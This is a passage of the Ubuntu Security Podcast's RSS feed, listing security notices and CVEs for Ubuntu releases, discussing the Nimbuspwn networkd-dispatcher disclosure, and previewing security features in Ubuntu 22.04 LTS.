<li><a href="https://ubuntu.com/security/CVE-2022-25309">CVE-2022-25309</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-25308">CVE-2022-25308</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5393-1-thunderbird-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5393-1">USN-5393-1</a>] Thunderbird vulnerabilities</h3>
<ul>
<li>8 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-1197">CVE-2022-1197</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28289">CVE-2022-28289</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28286">CVE-2022-28286</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28285">CVE-2022-28285</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28282">CVE-2022-28282</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28281">CVE-2022-28281</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1196">CVE-2022-1196</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1097">CVE-2022-1097</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5371-2-nginx-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5371-2">USN-5371-2</a>] nginx vulnerability</h3>
<ul>
<li>3 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-36309">CVE-2020-36309</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-11724">CVE-2020-11724</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3618">CVE-2021-3618</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5394-1-webkitgtk-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5394-1">USN-5394-1</a>] WebKitGTK vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-22637">CVE-2022-22637</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22629">CVE-2022-22629</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22628">CVE-2022-22628</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22624">CVE-2022-22624</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5392-1-mutt-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5392-1">USN-5392-1</a>] Mutt vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-1328">CVE-2022-1328</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-32055">CVE-2021-32055</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5395-1-networkd-dispatcher-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5395-1">USN-5395-1</a>] networkd-dispatcher vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-29800">CVE-2022-29800</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29799">CVE-2022-29799</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5396-1-ghostscript-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5396-1">USN-5396-1</a>] Ghostscript vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-25059">CVE-2019-25059</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5397-1-curl-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5397-1">USN-5397-1</a>] curl vulnerabilities</h3>
<ul>
<li>4 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-27776">CVE-2022-27776</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27775">CVE-2022-27775</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-27774">CVE-2022-27774</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-22576">CVE-2022-22576</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5398-1-simple-directmedia-layer-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-5398-1">USN-5398-1</a>] Simple DirectMedia Layer vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-33657">CVE-2021-33657</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5399-1-libvirt-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5399-1">USN-5399-1</a>] libvirt vulnerabilities</h3>
<ul>
<li>6 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3631">CVE-2021-3631</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25637">CVE-2020-25637</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0897">CVE-2022-0897</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4147">CVE-2021-4147</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3975">CVE-2021-3975</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3667">CVE-2021-3667</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5400-1-mysql-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5400-1">USN-5400-1</a>] MySQL vulnerabilities</h3>
<ul>
<li>23 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-21478">CVE-2022-21478</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21462">CVE-2022-21462</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21460">CVE-2022-21460</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21459">CVE-2022-21459</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21457">CVE-2022-21457</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21454">CVE-2022-21454</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21452">CVE-2022-21452</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21451">CVE-2022-21451</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21444">CVE-2022-21444</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21440">CVE-2022-21440</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21438">CVE-2022-21438</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21437">CVE-2022-21437</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21436">CVE-2022-21436</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21435">CVE-2022-21435</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21427">CVE-2022-21427</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21425">CVE-2022-21425</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21423">CVE-2022-21423</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21418">CVE-2022-21418</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21417">CVE-2022-21417</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21415">CVE-2022-21415</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21414">CVE-2022-21414</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21413">CVE-2022-21413</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21412">CVE-2022-21412</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5400-2-mysql-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5400-2">USN-5400-2</a>] MySQL vulnerabilities</h3>
<ul>
<li>6 CVEs addressed in Xenial ESM (16.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-21460">CVE-2022-21460</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21454">CVE-2022-21454</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21451">CVE-2022-21451</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21444">CVE-2022-21444</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21427">CVE-2022-21427</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-21417">CVE-2022-21417</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-5390-2-linux-kernel--raspberry-pi--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-5390-2">USN-5390-2</a>] Linux kernel (Raspberry Pi) vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-26490">CVE-2022-26490</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1016">CVE-2022-1016</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1015">CVE-2022-1015</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="nimbuspwn-01-46">Nimbuspwn [01:46]</h3>
<ul>
<li>Nimbuspwn -
<a href="https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/">https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/</a></li>
<li>At the end of April Microsoft disclosed some vulnerabilities which
gathered a lot of <a href="https://www.itnews.com.au/news/patch-now-against-linux-nimbuspwn-root-priv-esc-bugs-579295">media</a> <a href="https://www.bleepingcomputer.com/news/security/new-nimbuspwn-linux-vulnerability-gives-hackers-root-privileges/">attention</a>, leading to a lot of outlets seemingly
claiming most Linux systems were affected and that this was a high
severity issue</li>
<li>Describes a number of issues in <code>networkd-dispatcher</code> which could be used
to get RCE
<ul>
<li>directory traversal</li>
<li>symlink race</li>
<li>TOCTOU permissions check race condition</li>
</ul>
</li>
<li>However, all relies on being able to have an arbitrary process run under
the <code>systemd-network</code> user (since this user is the only one which can bind
to the right dbus name <code>org.freedesktop.network1</code>)</li>
<li>Originally they provided some vague mentions of gpgv plugins and epmd
running under this user.</li>
<li>gpgv plugins are launched by <code>apt=/=apt-get</code> during package install /
upgrade so this sounds like a common scenario that would affect most
users (instead of say epmd which is the erlang port mapper daemon, so
unless you are running erland applications you would not be affected by
that)</li>
<li>Looking again though at these gpg plugins running as the <code>systemd-network</code>
user - this is definitely not the case for standard Ubuntu - since <code>apt</code> is
very clear to run them under the <code>_apt</code> user account purposefully to
restrict their privileges</li>
<li>After we <a href="https://twitter.com/marcdeslaur/status/1521467237571383296">questioned</a> Microsoft about this, they amended the blog post to
then just say they were able to detect several instances of other
processes running under this user in various customer environments but
then state that some of these were due to customer
misconfigurations.</li>
<li>So there is no real evidence here that in general Ubuntu / Linux users
would be affected as all the original media reporting suggested</li>
<li>Perhaps these customers were using containers and running processes in
those where the UID mapped back to the systemd-network user ID on the
host? This is a common pitfall with containers and something which users
need to be aware of when deploying containers</li>
<li>As such, what appeared to be quite a high priority and <a href="https://www.securityweek.com/microsoft-warns-nimbuspwn-security-flaws-haunting-linux">high</a> <a href="https://www.itnews.com.au/news/patch-now-against-linux-nimbuspwn-root-priv-esc-bugs-579295">profile</a>
<a href="https://www.bleepingcomputer.com/news/security/new-nimbuspwn-linux-vulnerability-gives-hackers-root-privileges/">vulnerability</a> in fact is likely more of a bit of a non-issue - whilst it
could be argued that these are real issues in <code>networkd-dispatcher</code> since
they are not able to be exploited in standard configurations they are not
a real threat to most users</li>
<li>Interesting to note while the blog post has been
amended, all the various media articles which cited the original report
have not been updated and still seem to claim that Ubuntu and other
distros would be affected by this</li>
<li>Also interesting to note, Microsoft worked directly with the upstream
maintainer of <code>networkd-dispatcher</code> but didn&rsquo;t involve any downstream
distros - as suggested by <a href="https://twitter.com/JulianKlode/status/1521525589529743360">Julian Andres Klode</a> from the Ubuntu Foundations
team (and upstream apt maintainer) - perhaps Microsoft should have
pre-disclosed this issue to the <a href="https://oss-security.openwall.org/wiki/mailing-lists/distros">linux-distros mailing list</a> - if they had
done so this likely would have been assessed and clarified earlier so
that Microsoft could have more properly understood the extent of the
vulnerabilities which they discovered the internet could have avoided
another brief panic scenario</li>
</ul>
<h3 id="what-s-new-in-security-in-ubuntu-22-dot-04-lts--part-1--08-05">What&rsquo;s new in security in Ubuntu 22.04 LTS (part 1) [08:05]</h3>
<ul>
<li>Preview of the first half of blog post which will be published in the
coming weeks on the various security features which are included in
Ubuntu 22.04 LTS. This week we will look at enhancements provided by the
Linux kernel whilst next week we will look at features provided by other
parts of the distribution.</li>
<li>22.04 LTS latest long term support release - 5 years of standard support
plus 5 years of ESM - total 10 years of support via Ubuntu Advantage
(free for personal use)</li>
<li>Great foundation to use then to deploy services / applications etc and
know they will be supported for a long time to come</li>
<li>Has been 2 years since the last LTS so there are lots of features to
cover - I will only touch on some of them - if you want a more deep dive,
check out the <a href="https://ubuntu.com/blog/whats-new-in-security-for-ubuntu-21-04">blog</a> <a href="https://ubuntu.com/blog/whats-new-in-security-for-ubuntu-21-10">posts</a> we published for the interim releases</li>
<li>Optimised kernels for different platforms
<ul>
<li>OEM desktops - 5.17</li>
<li>Desktop &amp; server - 5.15</li>
<li>Desktop will get HWE stack by default so in future will get kernel
version upgrades bringing new features etc whilst server will stick
with GA kernel for stability</li>
<li>Clouds have their own optimised kernels</li>
</ul>
</li>
<li>Hardware specific enhancements
<ul>
<li>SGX on Intel for secure enclaves</li>
<li>Memory tagging on ARM64 to protect against memory corruption attacks</li>
<li>AMD SEV for KVM to protect guest VM registers from the host</li>
</ul>
</li>
<li>Generic kernel improvements
<ul>
<li>Core scheduling to provide a means to use SMT in the face of various
hardware microarchitectural side-channel attacks like L1TF and the like
(this was only partially mitigated in SW/microcode and could still
potentially affect VMs running across SMT siblings) - so in past had to
disable SMT to be fully certain were protected - now can use core
scheduling to specify to the kernel which processes should not be
scheduled on sibling HTs to avoid these sorts of attack</li>
<li>Kernel stack offset randomisation across system calls</li>
<li>BPF improvements - one of the most popular subsystems in the kernel,
used not just for tracing and packet filtering but also now BPF LSM and
more use-cases. However, has also caused a number of security vulns as
covered previously - now disabled unprivileged BPF by default. Also
work has been done to try and support signed BPF programs to ensure
only trusted code is executed as well.</li>
<li>Landlock LSM for application-level sandboxing - like seccomp, Landlock
allows a process to specify it&rsquo;s own policy so can sandbox itself -
rather than say traditional MAC systems of AppArmor/SELinux where the
system admin configures the policy
<ul>
<li>LSM stacking allows Landlock to be used in conjunction with AppArmor
for a more defense-in-depth approach</li>
</ul>
</li>
</ul>
</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E158.mp3" length="14501621" type="audio/mpeg" /><itunes:duration>1101</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 157
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-157/</link>
          <pubDate>Fri, 22 Apr 2022 11:33:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>520ab5eda515d6b3d50f0f54a2e02f1adaaa9e6d5ff115a0e98141bd445e46dcc4105fd19c5f8e027223dd814aef24163803f1858143ff7ce9d05e8ebe0393a5</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 157</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          Ubuntu 22.04 LTS (Jammy Jellyfish) is officially released 🎉 and so this
  week we take a quick look at the new features and enhancements, with a
  particular focus on security, plus we cover security updates for the Linux
  kernel, Firefox,...
        
        ]]></itunes:subtitle>
        <itunes:summary>  Ubuntu 22.04 LTS (Jammy Jellyfish) is officially released 🎉 and so this
  week we take a quick look at the new features and enhancements, with a
  particular focus on security, plus we cover security updates for the Linux
  kernel, Firefox, Django, Git, Gzip and more.
  </itunes:summary>
        <description>  Ubuntu 22.04 LTS (Jammy Jellyfish) is officially released 🎉 and so this
  week we take a quick look at the new features and enhancements, with a
  particular focus on security, plus we cover security updates for the Linux
  kernel, Firefox, Django, Git, Gzip and more.
  </description>
        <googleplay:description>  Ubuntu 22.04 LTS (Jammy Jellyfish) is officially released 🎉 and so this
  week we take a quick look at the new features and enhancements, with a
  particular focus on security, plus we cover security updates for the Linux
  kernel, Firefox, Django, Git, Gzip and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>Ubuntu 22.04 LTS (Jammy Jellyfish) is officially released 🎉 and so this
week we take a quick look at the new features and enhancements, with a
particular focus on security, plus we cover security updates for the Linux
kernel, Firefox, Django, Git, Gzip and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>58 unique CVEs addressed</p>
<h3 id="usn-5368-1-linux-kernel-vulnerabilities-00-51">[<a href="https://ubuntu.com/security/notices/USN-5368-1">USN-5368-1</a>] Linux kernel vulnerabilities [00:51]</h3>
<ul>
<li>23 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-27666">CVE-2022-27666</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0742">CVE-2022-0742</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0516">CVE-2022-0516</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0435">CVE-2022-0435</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0382">CVE-2022-0382</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0264">CVE-2022-0264</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-45480">CVE-2021-45480</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-45402">CVE-2021-45402</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-45095">CVE-2021-45095</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-44733">CVE-2021-44733</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43975">CVE-2021-43975</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4197">CVE-2021-4197</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4135">CVE-2021-4135</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-39698">CVE-2021-39698</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-39685">CVE-2021-39685</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28715">CVE-2021-28715</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28714">CVE-2021-28714</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28713">CVE-2021-28713</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28712">CVE-2021-28712</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28711">CVE-2021-28711</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0492">CVE-2022-0492</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1055">CVE-2022-1055</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-23222">CVE-2022-23222</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>5.13 azure/oracle for 20.04 LTS</li>
<li>BPF verifier could possibly allow pointer arithmetic in BPF operations -
OOB read / write -&gt; crash (DoS) or privesc</li>
<li>cgroups v1 <code>release_agent</code> not properly restricted -&gt; privesc</li>
<li>UAF in network traffic control - DoS/crash</li>
</ul>
<h3 id="usn-5377-1-linux-kernel--bluefield--vulnerabilities-01-52">[<a href="https://ubuntu.com/security/notices/USN-5377-1">USN-5377-1</a>] Linux kernel (BlueField) vulnerabilities [01:52]</h3>
<ul>
<li>15 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-27666">CVE-2022-27666</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0435">CVE-2022-0435</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-45480">CVE-2021-45480</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-45469">CVE-2021-45469</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-45095">CVE-2021-45095</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-44733">CVE-2021-44733</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-43976">CVE-2021-43976</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-4135">CVE-2021-4135</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28715">CVE-2021-28715</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28714">CVE-2021-28714</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28713">CVE-2021-28713</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28712">CVE-2021-28712</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-28711">CVE-2021-28711</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-0492">CVE-2022-0492</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1055">CVE-2022-1055</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>BPF verifier could possibly allow pointer arithmetic in BPF operations -
OOB read / write -&gt; crash (DoS) or privesc</li>
<li>cgroups v1 <code>release_agent</code> not properly restricted -&gt; privesc</li>
</ul>
<h3 id="usn-5366-1-fribidi-vulnerabilities-02-07">[<a href="https://ubuntu.com/security/notices/USN-5366-1">USN-5366-1</a>] FriBidi vulnerabilities [02:07]</h3>
<ul>
<li>3 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-25310">CVE-2022-25310</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-25309">CVE-2022-25309</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-25308">CVE-2022-25308</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Various memory corruption vulns in library for handling unicode
bidirectional text</li>
</ul>
<h3 id="usn-5369-1-oslo-dot-utils-vulnerability-02-21">[<a href="https://ubuntu.com/security/notices/USN-5369-1">USN-5369-1</a>] oslo.utils vulnerability [02:21]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-0718">CVE-2022-0718</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Python utility functions for OpenStack</li>
<li>Passwords which contained a double-quote would not be properly masked in
debug logs in which case the part of the password following the double
quote would be exposed</li>
</ul>
<h3 id="usn-5370-1-firefox-vulnerabilities-02-50">[<a href="https://ubuntu.com/security/notices/USN-5370-1">USN-5370-1</a>] Firefox vulnerabilities [02:50]</h3>
<ul>
<li>11 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-28287">CVE-2022-28287</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28283">CVE-2022-28283</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28289">CVE-2022-28289</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28288">CVE-2022-28288</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28286">CVE-2022-28286</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28285">CVE-2022-28285</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28284">CVE-2022-28284</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28282">CVE-2022-28282</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28281">CVE-2022-28281</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-24713">CVE-2022-24713</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-1097">CVE-2022-1097</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>99.0</li>
<li>Including an issue where just selecting text could be enough to cause a
memory corruption in text selection cache and cause firefox to crash</li>
</ul>
<h3 id="usn-5331-2-tcpdump-vulnerabilities-03-34">[<a href="https://ubuntu.com/security/notices/USN-5331-2">USN-5331-2</a>] tcpdump vulnerabilities [03:34]</h3>
<ul>
<li>2 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2020-8037">CVE-2020-8037</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16301">CVE-2018-16301</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-153/">Episode 153</a> for xenial - now same updates for bionic + focal</li>
</ul>
<h3 id="usn-5373-1-usn-5373-2-django-vulnerabilities-03-47">[<a href="https://ubuntu.com/security/notices/USN-5373-1">USN-5373-1</a>, <a href="https://ubuntu.com/security/notices/USN-5373-2">USN-5373-2</a>] Django vulnerabilities [03:47]</h3>
<ul>
<li>3 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Impish (21.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-32052">CVE-2021-32052</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28347">CVE-2022-28347</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-28346">CVE-2022-28346</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>2 different SQL injection attacks and 1 header in injection attack</li>
</ul>
<h3 id="usn-5374-1-libarchive-vulnerability-04-07">[<a href="https://ubuntu.com/security/notices/USN-5374-1">USN-5374-1</a>] libarchive vulnerability [04:07]</h3>
<ul>
